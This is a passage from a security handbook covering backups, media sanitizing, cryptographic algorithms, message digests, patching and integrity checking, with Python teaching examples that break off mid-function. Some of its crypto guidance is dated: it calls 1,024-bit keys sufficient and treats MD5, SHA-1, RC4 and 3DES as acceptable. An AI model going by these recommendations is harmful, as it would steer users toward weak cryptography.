Backups should be a prerequisite of any computer operation, secure or otherwise, but the information stored on backup tapes is extremely vulnerable. Protect your backups at least as well as you normally protect your computers. Never leave them unattended in a publicly accessible area; keep them in physically secure locations (preferably somewhere other than where your computers are kept); and be careful about whom you trust to carry them from one place to another.
Most backup programs allow you to encrypt data before it is written to the backup. Encrypted backups greatly reduce the chance that a stolen backup tape or CD-ROM will be of any use to an adversary. If you encrypt your backups, make sure you also protect the encryption key, both so that an attacker cannot find it and so that the key is not lost when staff change.
Archived backups are sometimes slowly erased by environmental conditions. Magnetic tape, for example, is susceptible to a process called print-through, in which the magnetic fields of one section of tape wound on the reel affect the layers beneath it. The only way to find out whether this is damaging your backups is to check them periodically.
A very common problem is inadequate labeling and cataloging of backup media. You can choose whatever labeling or cataloging system you find effective, provided that you pick one and document it thoroughly.
For tapes, you can use a degausser or bulk eraser, a hand-held electromagnetic device with a strong magnetic field. Read back tapes that you have bulk-erased until you learn how many passes of the eraser are needed to obliterate the data.
Software exists for overwriting optical media that erases even the contents of write-once media. However, the effectiveness of these methods varies from one type of media to another, and overwriting may still leave residues. For this reason, physical destruction may be preferable.
Incinerators and acid baths are very effective at destroying tapes, but they are not environmentally acceptable. Until recently, crushing hard disks and floppy disk packs was the preferred method, but as disk capacities increase, drives must be broken into smaller and smaller pieces to rule out laboratory analysis of the remains. Degaussers exist for disk drives, but they are expensive. As a result, physical erasure and destruction methods are gradually losing ground to software techniques.
A common sanitizing technique is to overwrite the entire disk or tape. If you are dealing with highly confidential or security-related information, you may wish to overwrite a tape or disk several times, because data can be recovered from tapes that have been overwritten only once. Tapes are commonly overwritten three times: once with blocks of 0s, once with blocks of 1s, and once with random numbers. Finally, the tape can be run through a band saw several times to reduce it to thousands of small pieces of plastic.
63 Sanitizing
64 Filtering
Provide a paper shredder at every location where valuable information is discarded. Teach users not to throw sensitive information into their household trash, but to bring it to the office to be shredded. If your organization is large enough and the law allows it, you may want to incinerate some sensitive paper waste on the premises.
Key Switches
Some kinds of computers have a key switch that can be used to prevent the system from being rebooted in single-user mode. Some computers also have ROM monitors that prevent the system from being rebooted in single-user mode without a password. Sun's OpenBoot system and all new Macintosh systems support passwords for controlling access to the boot configuration.
Key switches and ROM monitor passwords provide additional security and should be used whenever possible. [66] Keep in mind, however, that all it takes to disrupt a computer is for someone to unplug it. The most important way to protect a computer, therefore, is to restrict physical access to it.
65 Terminals
66 There is another good reason to set ROM monitor passwords. Consider what could happen if an attacker gained access to a computer, set a password on it, and then powered it off.
Chapter Four
Information Security
Overview
This chapter focuses on mechanisms that protect information against unintended disclosure, alteration, or destruction. These dimensions of security are usually called confidentiality [67] (they prevent unauthorized users from accessing or altering data, programs, and system integrity), and they ensure that information and software remain intact and correct. The discussion here is largely conceptual, although examples are given of how some of the principles apply to real systems.
Cryptography
Cryptography [68] is a collection of mathematical techniques for protecting information. Using cryptography, you can transform written words and other kinds of messages so that they appear meaningless to anyone who does not hold the special mathematical key needed to unlock them. Using cryptography to disguise a message is called encryption [69]. The process of returning an encrypted message to its original form with the appropriate key is called decryption [70].
Cryptography is used to prevent information from being accessed by an unauthorized recipient. In theory, once a piece of information has been encrypted, it can be accidentally disclosed or intercepted by a third party without compromising its security, provided that the key needed to decrypt it has not been disclosed and that the encryption method resists attempts to decrypt the information without the key.
In addition to providing confidentiality, cryptography is also used to ensure message integrity and non-repudiation [71].
67 Or privacy, which is sometimes used interchangeably with "confidentiality" and sometimes refers more specifically to the protection of individuals' personal information.
68 Cryptography
69 Encryption
70 Decryption
71 Message Non-Repudiation
72 Secret Key Algorithms
73 Private Key Algorithms
… easily confused with public-key algorithms [74], which are unrelated to symmetric-key algorithms. Symmetric-key algorithms can be divided into two categories: block algorithms [75] and stream algorithms [76]. Block algorithms encrypt data one block (a number of bytes) at a time, whereas stream algorithms encrypt it byte by byte (or even bit by bit).
Symmetric-key algorithms are the workhorses of modern cryptographic systems. They are generally much faster than public-key algorithms and somewhat easier to implement. Unfortunately, symmetric-key algorithms have three problems that limit their use in the real world:
• For two parties to communicate securely using a symmetric-key algorithm, they must first exchange an encryption key. Exchanging an encryption key securely can be very difficult.
• As long as they want to send or receive messages, both parties must keep a copy of the key and keep it secure. If one party's key is compromised and the other party is unaware of it, the second party may send a message to the first, and that message could then be exploited using the compromised key.
• If every pair of users wants to secure its communications with this kind of algorithm, each pair needs its own unique key, which for N different users requires (N² − N) / 2 keys. As the number of users grows, this number quickly becomes unmanageable.
… public-key technology, the private key is used to create a digital signature, and others can therefore verify the signature with the corresponding public key.
Unfortunately, public-key algorithms are computationally expensive. In practice, public-key encryption and decryption require 1,000 times the computing power of an equivalent symmetric-key encryption algorithm. To obtain the benefits of public keys together with the speed of symmetric encryption systems, most modern encryption systems actually use a combination:
Message Digest Functions
A message digest function generates a seemingly random pattern of bits for any given input. The digest value is computed in such a way that finding an input that produces exactly a given digest is computationally infeasible. Message digests are often called "file fingerprints." Most systems that perform digital signatures encrypt a message digest of the data rather than the original file data itself.
• The difficulty of guessing the key or of trying every possible key (a key search). Longer keys are generally harder to find or guess;
• The difficulty of inverting the encryption algorithm without knowing the encryption key (breaking the algorithm);
• The absence of back doors, or of other conditions that make it easier to decrypt an encrypted file without knowing the decryption key;
• The impossibility of decrypting an entire encrypted message when you know how part of it decrypts (this is called a known-plaintext attack [80]); and
• The properties of the plaintext and the attacker's knowledge of those properties. For example, a cryptographic system may be vulnerable to attack if all of its encrypted messages begin or end with a known piece of plaintext.
In general, cryptographic strength is never proven; it is only disproven. When a new encryption algorithm is proposed, its author almost always believes that the algorithm guarantees perfect security, that is, that there is no way to decrypt an encrypted message without the corresponding key. After all, if the algorithm had a known flaw, the author would not propose it in the first place (or at least would not propose it in good conscience).
As part of evaluating an algorithm's strength, a mathematician can show that the algorithm resists specific kinds of attacks that have previously been used to expose flaws in other algorithms. Unfortunately, even an algorithm that resists every known attack is not necessarily secure, because new kinds of attacks are developed all the time.
From time to time, individuals or organizations claim to have invented symmetric encryption algorithms that are far more secure than existing ones. Such claims should generally be treated with skepticism. Because there are no known attacks today against the encryption algorithms in wide use, there is no reason to use new, untested encryption algorithms, which may have hidden flaws.
… in that case will destroy the Earth, and assuming there are no other weaknesses in the algorithm used, a 128-bit encryption key should be sufficient for most cryptographic applications!
DES
The Data Encryption Standard (DES) [83], adopted as a US government standard in 1977 and as an ANSI standard in 1981, is a block cipher that uses a 56-bit key and has several modes of operation, depending on the purpose for which it is used. DES is a strong algorithm, but its short key length limits its usefulness today. In 1998, a special-purpose DES-cracking machine was built by the Electronic Frontier Foundation (EFF) [84] for less than $25,000; in a public demonstration it found the key of an encrypted message in less than a day, before the eyes of members of a coalition of computer users from around the world.
Triple-DES [85]
Triple-DES is a way of making DES dramatically more secure by applying the DES encryption algorithm three times with three different keys, for a total key length of 168 bits. This algorithm, also called "3DES," has been widely used by financial institutions and by Secure Shell (SSH) [86]. In theory, using DES twice with two different keys does not improve security as much as one might at first expect, because of a known-plaintext attack called meet-in-the-middle [87], in which the attacker simultaneously tries encrypting the plaintext with a single DES operation and decrypting the ciphertext with another single DES operation until a match is found in the middle.
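The cost argument behind the meet-in-the-middle remark above can be checked on a cipher small enough to search completely. The following is an added teaching example, not part of the original handbook: the 24-bit-block, 12-bit-key Feistel cipher is made up for the purpose and stands in for DES only structurally.

```python
"""Why double encryption adds little: meet-in-the-middle on a toy cipher.

Added teaching example. The cipher below is a made-up 4-round Feistel
network with a 24-bit block and a 12-bit key, small enough to search
exhaustively. It stands in for DES only structurally; it is not DES.
"""
import hashlib

KEY_BITS = 12
HALF_BITS = 12
HALF_MASK = (1 << HALF_BITS) - 1
ROUNDS = 4


def _round(half, key, rnd):
    """Keyed round function: 12 pseudo-random bits from (round, key, half)."""
    data = bytes([rnd]) + key.to_bytes(2, "big") + half.to_bytes(2, "big")
    digest = hashlib.blake2s(data, digest_size=2).digest()
    return int.from_bytes(digest, "big") & HALF_MASK


def encrypt(block, key):
    left, right = block >> HALF_BITS, block & HALF_MASK
    for rnd in range(ROUNDS):
        left, right = right, left ^ _round(right, key, rnd)
    return (left << HALF_BITS) | right


def decrypt(block, key):
    left, right = block >> HALF_BITS, block & HALF_MASK
    for rnd in reversed(range(ROUNDS)):
        left, right = right ^ _round(left, key, rnd), left
    return (left << HALF_BITS) | right


def double_encrypt(block, k1, k2):
    return encrypt(encrypt(block, k1), k2)


def meet_in_the_middle(pairs):
    """Find every (k1, k2) consistent with known (plaintext, ciphertext) pairs.

    Returns (candidates, number of single-cipher operations in the search).
    """
    (p0, c0), rest = pairs[0], pairs[1:]
    # Forward half: encrypt the first plaintext under every possible k1.
    table = {}
    for k1 in range(1 << KEY_BITS):
        table.setdefault(encrypt(p0, k1), []).append(k1)
    operations = 1 << KEY_BITS
    # Backward half: decrypt the ciphertext under every k2, look for a match.
    candidates = []
    for k2 in range(1 << KEY_BITS):
        operations += 1
        for k1 in table.get(decrypt(c0, k2), ()):
            # Further known pairs weed out chance matches in the middle.
            if all(double_encrypt(p, k1, k2) == c for p, c in rest):
                candidates.append((k1, k2))
    return candidates, operations


def demo():
    """Return (keys found, operations used, size of the naive key space)."""
    k1, k2 = 0x3A7, 0xC15                      # constructed secret keys
    plaintexts = (0x123456, 0xABCDEF, 0x0F0F0F)
    pairs = [(p, double_encrypt(p, k1, k2)) for p in plaintexts]
    found, operations = meet_in_the_middle(pairs)
    return found, operations, 1 << (2 * KEY_BITS)


if __name__ == "__main__":
    found, operations, naive = demo()
    print("keys:", [(hex(a), hex(b)) for a, b in found])
    print("search cost:", operations, "operations instead of", naive)
```

Two 12-bit keys give a nominal 24-bit key space, yet the search needs about 2^13 cipher operations plus a table of 2^12 entries; the same arithmetic is why double DES offers roughly 57 bits of work rather than 112, and why three passes are used instead.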
BlowFish
BlowFish is a fast, compact, and simple block encryption algorithm invented by Bruce Schneier [88]. The algorithm takes a variable-length key of up to 448 bits and is optimized for execution on 32-bit and 64-bit processors. The algorithm is currently unpatented and has been placed in the public domain. BlowFish …
IDEA
The International Data Encryption Algorithm (IDEA) [89] was developed in Zurich, Switzerland, by James L. Massey [90] and Xuejia Lai [91] and was published in 1990. IDEA uses a 128-bit key and is used by the popular program PGP to encrypt files and electronic mail. Unfortunately, wider use of IDEA has been limited by a series of software patents on the algorithm, currently held by Ascom-Tech AG in Solothurn, Switzerland.
82 A more complete list of these algorithms appears on pages 169 to 176 of "Practical Unix & Internet Security" (PUIS), published by O'Reilly.
83 Data Encryption Standard
84 Electronic Frontier Foundation
85 Triple-DES
86 Secure Shell
87 Meet in the Middle
88 Bruce Schneier
89 International Data Encryption Algorithms
90 James L. Massey
91 Xuejia Lai
RC4
This stream cipher was originally developed by Ronald Rivest [92] and kept as a trade secret by RSA Data Security. The algorithm was disclosed in 1994 by an anonymous Usenet user and appears to be reasonably strong. RC4 uses keys of between 1 and 2,048 bits.
Rijndael (AES)
This algorithm was developed by Joan Daemen [93] and Vincent Rijmen [94] and was selected in October 2000 by the National Institute of Standards and Technology (NIST) [95] as the new US Advanced Encryption Standard. Rijndael is an extremely fast and compact cipher that can use keys of 128, 192, or 256 bits.
Cryptographers test the strength of their algorithms through peer review. When an algorithm is published, other cryptographers look for flaws or weaknesses in it. Do not trust people who claim to have invented a new encryption algorithm: if they are unwilling to disclose how their algorithms work, it may be because disclosure would undermine the algorithms' credibility. In practice there is no reason to keep an algorithm secret, because real security lies in openness.
On the other hand, it is important to understand that merely publishing an algorithm or a piece of code does not guarantee that its flaws will be found. The WEP encryption algorithm, which was introduced by the 802.11 networking standards body, was in use for years before a major flaw was found in it. The flaw had been there all along, but no one had run into a problem that prompted them to look for one.
… key lengths, the relative strength and cryptographic power of these algorithms cannot be inferred. Key lengths in public-key algorithms typically range from 512 to 2,048 and 4,096 bits, and for many users a length of 1,024 bits is sufficient for the foreseeable future. The following list summarizes the public-key systems in common use today:
Diffie-Hellman
A system for exchanging cryptographic keys between communicating parties. Diffie-Hellman is not actually a method of encryption and decryption, but a method of developing and exchanging a shared private key over a public communications channel. In effect, the two parties agree on some common numerical values, and then each party creates a key. Mathematical transformations of the keys are exchanged, and each party can then compute a third, session key that cannot easily be derived by an attacker who knows both exchanged values.
DSA/DSS
The Digital Signature Standard (DSS) was developed by the U.S. National Security Agency and adopted by the National Institute of Standards and Technology as a Federal Information Processing Standard (FIPS). DSS is based on the Digital Signature Algorithm (DSA). Although DSA permits keys of any length, only keys between 512 and 1024 bits are permitted under the DSS FIPS. As stated, DSS can be used only for digital signatures, although it is also possible to use some DSA implementations for encryption.
Elliptic curves
Elliptic curve cryptosystems are public key encryption systems that are based on elliptic curves rather than on the older approach of logarithmic functions. The advantage of using elliptic curve systems stems from the fact that no tractable algorithm is known for computing discrete logarithms on elliptic curves. For this reason, short keys in elliptic curve cryptosystems can provide a high degree of confidentiality and security, and their computations are also very fast. Elliptic curves can also be implemented efficiently in hardware.
RSA
RSA is a well-known public key cryptosystem that was developed in 1977 by three MIT professors: Ronald Rivest, Adi Shamir, and Leonard Adleman. RSA can be used both for encrypting information and as the basis of a digital signature system. Digital signatures can be used to prove the authenticity or provenance of digital information. In this system the key can be of any length, depending on the particular implementation that is used.
Message digest functions
Message digest functions turn the information inside a file (large or small) into a single large number, usually between 128 and 256 bits long. The best message digest functions have the following properties:
a) Every bit of the message digest function's output is potentially influenced by every bit of the function's input.
b) If any given bit of the function's input is changed, every output bit has a 50 percent chance of changing.
c) Given an input file and its corresponding message digest, it should be computationally infeasible to find another file with the same message digest value.
In theory, two different files can have the same message digest value. This is called a collision. For a message digest function to be secure, it must be computationally infeasible to find or produce such collisions.
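The three properties listed above can be measured directly. The following Python sketch is an added illustration, not code from the handbook: it flips every input bit of a constructed sample message and reports how the output reacts, for SHA-256 and, as a contrast, for a toy additive checksum (`additive_checksum`, `avalanche_report` and the sample messages are names and values made up for this example).

```python
import hashlib
from typing import Callable

Digest = Callable[[bytes], bytes]


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def additive_checksum(data: bytes) -> bytes:
    """Toy 16-bit checksum (sum of all bytes). NOT a message digest; contrast only."""
    return (sum(data) % 65536).to_bytes(2, "big")


def flip_bit(data: bytes, index: int) -> bytes:
    """Return a copy of `data` with bit number `index` inverted."""
    buf = bytearray(data)
    buf[index // 8] ^= 1 << (index % 8)
    return bytes(buf)


def changed_bits(a: bytes, b: bytes) -> int:
    """XOR of two equal-length outputs; each set bit marks a position that differs."""
    return int.from_bytes(a, "big") ^ int.from_bytes(b, "big")


def avalanche_report(message: bytes, digest: Digest) -> dict:
    """Flip each input bit in turn and measure the effect on the output.

    Property (b): mean_fraction_changed should be close to 0.5.
    Property (a): output_bits_never_changed should be 0.
    """
    base = digest(message)
    out_bits = len(base) * 8
    in_bits = len(message) * 8
    total_changed = 0
    ever_changed = 0  # bit mask of output positions that changed at least once
    for i in range(in_bits):
        diff = changed_bits(base, digest(flip_bit(message, i)))
        total_changed += bin(diff).count("1")
        ever_changed |= diff
    return {
        "mean_fraction_changed": total_changed / (in_bits * out_bits),
        "output_bits_never_changed": out_bits - bin(ever_changed).count("1"),
    }


def collides(a: bytes, b: bytes, digest: Digest) -> bool:
    """Property (c) fails if two different inputs share one output value."""
    return a != b and digest(a) == digest(b)


# Constructed sample inputs: the second only reorders the digits of the first.
SAMPLE = b"Transfer 100 units from account A to account B."
REORDERED = b"Transfer 001 units from account A to account B."

if __name__ == "__main__":
    for name, fn in (("SHA-256", sha256), ("additive checksum", additive_checksum)):
        print(name, avalanche_report(SAMPLE, fn),
              "collision:", collides(SAMPLE, REORDERED, fn))
```

The additive checksum changes only a few output bits per input change and gives both sample messages the same value, which is why a plain checksum cannot stand in for a message digest.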
Many message digest functions have been proposed and are in use today. A few examples are listed below:
MD2
Message Digest #2 was developed by Ronald Rivest. This message digest is the most secure of Rivest's message digest functions, but it also takes the longest to compute. As a result, MD2 is rarely used. MD2 produces a 128-bit digest.
MD4
Message Digest #4 was also developed by Ronald Rivest. This message digest algorithm was devised as a faster alternative to MD2. MD4 was subsequently shown to have potential weaknesses: it may be possible to find a file that produces the same MD4 as a given file without requiring a brute force search (which is itself infeasible, for the same reason that searching a 128-bit key space is infeasible). MD4 also produces a 128-bit digest.
MD5
Message Digest #5 was also developed by Ronald Rivest. MD5 is a modification of MD4 that uses techniques designed to make it more secure. Although MD5 is widely used, several flaws were discovered in it in the summer of 1996 that made it possible to compute certain kinds of collisions in a weakened version of the algorithm. As a result, MD5 is slowly falling out of favor. Both MD5 and SHA-1 are used in SSL technology and in Microsoft authentication. MD5 also produces a 128-bit digest.
SHA
The Secure Hash Algorithm is related to MD4 and was designed for use with the National Institute of Standards and Technology's Digital Signature Standard (NIST's DSS). Shortly after SHA was published, NIST announced that it was not suitable for use without a small change. SHA produces a 160-bit digest.
SHA-1
The "revised Secure Hash Algorithm" differs slightly from SHA. It is not publicly known whether these changes make SHA-1 more secure than SHA, but many people believe that they do. SHA-1 also produces a 160-bit digest.
103 Collision
104 Message Digest #2
105 Secure Hash Algorithm
Because of their properties, message digest functions are also an important part of many cryptographic systems in use today. Message digests are the basis of most digital signature standards. Today's digital signature standards specify that, instead of signing the entire document, it is sufficient to sign the document's message digest.
Message digests can also readily be used for message authentication codes (MACs), which use a secret shared between the two communicating parties to prove that a message is authentic. MACs are appended to the end of the message that is to be verified (RFC 2104 describes how to use keyed hashing for message authentication). MACs based on message digests provide additional cryptographic security for Internet routing protocols.
Maintaining integrity
Maintaining the integrity and correctness of the information stored on computers is vital to overall security and to reliable operation. You must ensure the integrity of the operating system, the integrity of the applications, and the integrity of your data. For operating systems and applications, this involves not only monitoring for unwanted changes to your software, but also applying the security patches and fixes needed to keep the software secure.
108 Metadata
Software package management is not exclusive to commercial systems. Free-software, Unix-based distributions also provide software management systems to make it easier for administrators to keep a system up to date. Several Linux-based distributions have adopted the RPM package management system. This system uses a single command, rpm, for all of its package management tasks. Debian GNU/Linux uses an alternative package management system called dpkg. BSD-based Unix systems concentrate on source-based updates, but they also provide a collection of precompiled software packages that are managed with the pkg_add, pkg_delete, and pkg_info commands.
… result in the new version. The diff program produces these files, and the patch program applies them to the old version so that, once the update has been carried out, the new version is created. After patching the source code, the system administrator compiles the application and reinstalls it.
For example, FreeBSD and the Unix versions related to it distribute a large number of applications in their ports collections. An application there consists of the original source code and a set of patches that have been applied to improve the application's integration into the BSD environment. The makefiles automatically build the application, install it, and then register the application's files with the relevant BSD command (pkg_add). This approach is widely used on FreeBSD systems to maintain third-party software.
CVS
Another approach to source management is to store the source code on a server using a source code revision control system such as the Concurrent Versions System (CVS), and to configure the server to allow anonymous client connections. Users who want to bring their source code up to the latest release use the CVS program to check out the latest patched version, after which the updated source can be compiled and installed.
FreeBSD, NetBSD, and OpenBSD use CVS to distribute and maintain the core software of their operating systems. In addition, tens of thousands of open source software projects maintain their own CVS servers or are hosted at sites such as sourceforge.net that provide CVS repositories. A good reference on CVS is the book "Essential CVS", published by O'Reilly and Associates.
Mirror sites are an important security advantage because they increase the availability of software through redundancy. They are also very useful when you have a fast connection to one of the mirror sites and a slow connection to the primary site. On the other hand, mirror sites raise several security concerns:
• The administrators of mirror sites control the local copies of the software and may be able to corrupt them, replace them with a version containing a Trojan horse, and so on. In this situation you must trust not only the vendor but also the administrators of the mirror site. If the vendor publishes digital signatures along with its software (for example, PGP signatures with source code archives, gnupg signatures in rpm files, or signed ActiveX programs), then, because you can obtain the vendor's public key directly from the vendor's own site rather than from the mirror site, you can be more confident that the software you receive is the software that the original vendor released. Some update systems automatically check the signatures of patches before applying them.
• Even if you trust the mirror site, its daily update may not be fast enough for your purposes. If a very important security patch is released, you may not be able to wait 24 hours for your local mirror site to be updated. In such cases there is no alternative to downloading the patches directly from the original vendor's site.
Be very careful about applying patches that you find in mailing lists and on public bulletin boards. At worst, such patches may have been created to trick people into installing a new vulnerability on their systems; at best, they have usually been produced by inexperienced programmers whose systems differ from yours, so their solution may do your system more harm than good.
If you are upgrading a server program, you must stop the server process and start it again so that the newly installed version is the one that runs. Merely replacing the server program on the hard disk is not enough to replace the old version with the new one.
Upgrading application software on Windows systems is somewhat less uniform. If the application is one of Microsoft's core programs, such as Internet Explorer or Media Player, the WindowsUpdate updater takes care of it; every other application must provide its own upgrade method. Some may force you to uninstall the older version before you can install the new one; for some it may be enough to install the new version over the old one; and others may have an upgrade process of their own (antivirus programs are good examples of this). You will have to follow each program's own procedure.
Tampering
There are several different ways to combat tampering. In addition to taking care in how user and file permissions are organized, important files that change infrequently can be kept on read-only media. Files can also be encrypted, so that changing the information in them requires getting past additional security steps. (Despite this, it may still be possible to delete or corrupt these files.)
There are also many ways to detect tampering. On smaller systems, or when the number of key files that need protecting is limited, backing the files up to write-once media can be an effective strategy. The files are regularly compared with their archived counterparts; if a file has been corrupted, the backup copy can be used to restore it, and when an authorized change is made to a file, the backup copy is updated to match.
Cryptographic digests of important files can be computed and stored offline, or protected with encryption. As mentioned earlier, an important property of cryptographic digests is that it is not feasible to produce a new file whose digest matches the computed digest. Some antivirus systems can perform a similar function, often called inoculation, in which checksums are inserted into executable files. Chapter 5 gives a more detailed discussion of using comparison files and cryptographic digests for continuous auditing of system data.
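The digest-based check described above, as an added Python sketch that is not part of the handbook: it records SHA-256 digests of every file under a directory, derives one fingerprint of that manifest to keep offline, and later reports modified, missing, and added files. The function names and the sample tree built in `demo()` are constructed for this illustration.

```python
from __future__ import annotations

import hashlib
import json
import tempfile
from pathlib import Path


def file_digest(path: Path, chunk_size: int = 65536) -> str:
    """SHA-256 of a file, read in chunks so large files are not loaded whole."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map each regular file under `root` (relative path) to its digest."""
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            manifest[path.relative_to(root).as_posix()] = file_digest(path)
    return manifest


def manifest_fingerprint(manifest: dict[str, str]) -> str:
    """One digest over the whole manifest; this is the value to store offline."""
    canonical = json.dumps(manifest, sort_keys=True).encode("utf-8")
    return hashlib.sha256(canonical).hexdigest()


def audit(root: Path, manifest: dict[str, str], trusted_fingerprint: str) -> dict[str, list[str]]:
    """Compare the live tree with the baseline, after checking the baseline itself."""
    if manifest_fingerprint(manifest) != trusted_fingerprint:
        raise ValueError("baseline manifest does not match its offline fingerprint")
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in current),
        "added": sorted(p for p in current if p not in manifest),
    }


def demo() -> dict[str, list[str]]:
    """Build a small constructed tree, take a baseline, change it, and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "bin").mkdir()
        (root / "etc" / "passwd").write_text("root:x:0:0\n")
        (root / "etc" / "motd").write_text("welcome\n")
        (root / "bin" / "login").write_bytes(b"original-binary")

        baseline = build_manifest(root)
        fingerprint = manifest_fingerprint(baseline)  # kept on offline media

        # Simulated unauthorized changes made after the baseline was taken.
        (root / "bin" / "login").write_bytes(b"replaced-binary")
        (root / "etc" / "motd").unlink()
        (root / "etc" / "rc.local").write_text("new startup entry\n")

        return audit(root, baseline, fingerprint)


if __name__ == "__main__":
    print(demo())
```

If the manifest were kept only on the monitored system, whoever changed a file could also rewrite its recorded digest; checking the manifest against the offline fingerprint first is what makes the comparison trustworthy.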
Backups
Bugs, accidents, natural disasters, and attacks on the system cannot be predicted, and usually, despite the best efforts, they cannot be prevented. But if you have backups, you can repair your system and bring it back to a stable state. Even if you lose your entire computer, for example to a fire, with a complete set of backups you can recover your information after buying a replacement machine. The cost of a new microprocessor and disk drive may be covered by an insurance company, but your information is something that in many cases will be irreplaceable.
Years ago, making daily backups was common practice, because computer hardware would often fail for no apparent reason and a backup was the only protection against data loss. Today, hardware failure is still a good reason to back up systems. Whether a hard disk fails is entirely a matter of chance: even if a good hard disk lasts five years or a little more on average, an organization with about 20 to 30 hard disks should expect a significant failure every few months. Disk drives usually fail without warning, sometimes only a few days after they have been put into service. It is therefore prudent to back up the system at regular intervals.
Backups can also be an important tool for securing computers against attacks. In particular, a full backup allows you to find out what an attacker has changed by comparing the files on the computer with the files on the backup. Make the first backup of your system after installing the operating system, and after that install your applications and apply the necessary security patches. This first backup not only allows you to analyze your system after an attack to learn what has been changed, but can also reduce the time needed to rebuild the system if a hardware failure occurs.
Some of these services can be quite sophisticated. For example, they can examine the MD5 checksums of your files and back up only the files that are unique. In that case, if you have thousands of computers that all have Microsoft Office on them, none of the files of those programs are added to the backup.
Types of backups
There are three general types of backup: the level-zero (day-zero) backup, the full backup, and the incremental backup.
Full backup
A copy of every file on the computer is made on the backup. This method is similar to the "day-zero backup", except that it is carried out from time to time.
118 Customized
Incremental backup
Only those files are copied that have changed after a particular event (such as patching a vulnerable application) or a particular date (such as the date of the last full backup). Full backups and incremental backups are usually used together. A common backup strategy today is as follows:
• Make a full backup on the first day of the week, every other week; and
• Make an incremental backup at the end of every event that occurs on the system after the last full backup was made. Because this kind of incremental backup archives the files that have changed since the last full backup, it is sometimes called a differential backup.
Most administrators of large systems plan and store their backups by partition or by disk drive. Different partitions usually require different backup strategies. On the principle that every change you make is very important, some partitions, such as your system partition (if it is separate), should normally be backed up every time a change is made to them. For these, full backups should be used instead of incremental backups, because their backup is usable only if it is complete. Similarly, partitions that are used only to store applications need to be backed up only when new programs are installed or the configuration of existing programs changes.
Incremental backups, on the other hand, are better suited to partitions that are used to store user files. You may, however, want to make this kind of backup frequently, so that if a failure occurs you have minimized the amount of work you could lose.
When you make incremental backups, use a set of backup tapes or disks in rotation. Tonight's backup should not be written over the tape that was used for last night's backup. Otherwise, if the computer fails in the middle of tonight's backup, you will lose all of the data on the disk: the data of tonight's backup (because it is incomplete) and the data of last night's backup (because part of it has been overwritten by tonight's backup). Ideally, make an incremental backup once a night, and have a separate tape for each night of the week.
It may take a week or a month before you notice that a file has been deleted. You should therefore keep some backup tapes for a week, some for a month, and some for several months. Many organizations archive their yearly or quarterly backups permanently. Some organizations also keep their annual or biennial backups forever, because doing so is a small investment set against the possibility that they will be needed one day. In some countries there may be legal requirements that mandate keeping backups of particular kinds of data (such as accounting records) for a minimum period. On the other hand, it is also important to have a data destruction policy that specifies the maximum length of time for which backups are kept.
You may want to keep an index or listing of the names of the files on your backup tapes. That way, whenever you need to restore a file, you can find the right tape to use by checking the listing, instead of having to read each tape individually. Having a printed copy of these listings is also a good idea, especially if your electronic listing is kept on a system that may itself need to be restored!
If you keep backups for a long time, make sure that when you buy a new backup system the backup data is transferred to it correctly. Otherwise you may end up with tapes that cannot be read by anyone, anywhere. This has happened to major research universities and even to the U.S. National Aeronautics and Space Administration (NASA).
At least once a year you should try to restore your entire system from backups, to make sure that your backup system is working properly. Start with a different, unconfigured computer and see whether you can restore all of your tapes and get the computer running. Sometimes you will discover that some important files are missing from your backup tapes. These practical tests are the best time to discover problems and fix them.
A very good test is to pick a file at random once a week or once a month and try to restore it. This will not only show whether the backups are comprehensive; the experience gained from these restores may also make a real restore operation much easier.
A detailed discussion of backup and restore systems could be the subject of a separate book; Curtis Preston's Unix Backup and Recovery, published by O'Reilly, is an excellent example.
Transmission integrity
Cryptography offers a way to ensure that when you send data over a network to someone else, the recipient receives it exactly as you sent it, protected from accidental corruption or deliberate tampering. A common strategy involves digitally signing the file, by computing a cryptographic digest and encrypting the digest with a symmetric or asymmetric algorithm, and then sending it along with the file (which may itself be encrypted for confidentiality). The recipient recomputes the digest from the file and then decrypts the transmitted digest. If the two match, the integrity of the message is assured.
The hash message authentication code (HMAC) is another way of verifying the integrity of a message transmitted between two parties who have agreed on a shared secret key. HMAC combines the original message and a key in order to compute a message digest function over both of them. Sometimes additional information, such as protocol sequence numbers, is also included in order to defeat replay attacks. The sender computes the HMAC over the message, the key, and any additional information, and transmits the HMAC along with the original message. The recipient recomputes the HMAC using the message and its own copy of the secret key (together with the additional information, such as the expected sequence number), and then compares the computed HMAC with the received HMAC to see whether they match. If they match, then, because the message digest has not changed, the recipient knows that the original message has not been altered.
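The exchange described above, as an added Python sketch (not code from the handbook) using the standard `hmac` module. The sequence number is never transmitted: each side mixes its own counter into the HMAC, so a replayed or altered frame fails verification. The `Sender` and `Receiver` classes, the frame layout, and the sample key and messages are assumptions made for this illustration.

```python
import hashlib
import hmac
import struct
from typing import List, Optional

TAG_LEN = hashlib.sha256().digest_size  # 32-byte HMAC-SHA256 tag


def compute_tag(key: bytes, seq: int, message: bytes) -> bytes:
    """HMAC over a fixed-width sequence number followed by the message."""
    return hmac.new(key, struct.pack(">Q", seq) + message, hashlib.sha256).digest()


class Sender:
    def __init__(self, key: bytes) -> None:
        self._key = key
        self._seq = 0

    def protect(self, message: bytes) -> bytes:
        """Return message || tag and advance the sender's sequence number."""
        frame = message + compute_tag(self._key, self._seq, message)
        self._seq += 1
        return frame


class Receiver:
    def __init__(self, key: bytes) -> None:
        self._key = key
        self._expected_seq = 0

    def accept(self, frame: bytes) -> Optional[bytes]:
        """Return the message if its tag verifies for the expected sequence number."""
        if len(frame) < TAG_LEN:
            return None
        message, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
        expected = compute_tag(self._key, self._expected_seq, message)
        # Constant-time comparison avoids leaking how many tag bytes matched.
        if not hmac.compare_digest(tag, expected):
            return None
        self._expected_seq += 1  # advance only after a frame has been accepted
        return message


def run_exchange() -> List[Optional[bytes]]:
    """Constructed scenario: genuine, replayed, altered, genuine, wrong-key frames."""
    key = bytes(range(32))  # constructed demo key; real keys come from a CSPRNG
    sender, receiver = Sender(key), Receiver(key)
    f0 = sender.protect(b"open valve 7")
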